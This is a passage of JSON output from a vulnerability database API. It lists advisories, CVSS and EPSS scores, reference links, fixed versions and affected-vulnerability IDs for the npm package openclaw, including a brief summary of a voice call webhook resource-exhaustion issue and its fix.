                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41396",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41396"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qcj9-wwgw-6gm8",
                    "reference_id": "GHSA-qcj9-wwgw-6gm8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qcj9-wwgw-6gm8"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41396",
                "GHSA-qcj9-wwgw-6gm8"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5rgx-2krs-guck"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90967?format=api",
            "vulnerability_id": "VCID-5s6h-u8x6-myfk",
            "summary": "OpenClaw is vulnerable to unauthenticated resource exhaustion through its voice call webhook handling\n## Summary\nVoice Call webhook handling buffered request bodies before provider signature checks, enabling bounded unauthenticated resource exhaustion.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `651dc7450b68a5396a009db78ef9382633707ead`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/voice-call/src/webhook.ts now enforces header gating and shared pre-auth body caps before reading attacker-controlled request bodies.\n- extensions/voice-call/src/webhook.test.ts ships regression coverage for missing-signature, oversize, and timeout pre-auth webhook cases.\n\nOpenClaw thanks @SEORY0 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35626",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00124",
                            "scoring_system": "epss",
                            "scoring_elements": "0.3119",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00124",
                            "scoring_system": "epss",
                            "scoring_elements": "0.31121",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00124",
                            "scoring_system": "epss",
                            "scoring_elements": "0.31157",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35626"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35626",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35626"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rm59-992w-x2mv",
                    "reference_id": "GHSA-rm59-992w-x2mv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rm59-992w-x2mv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
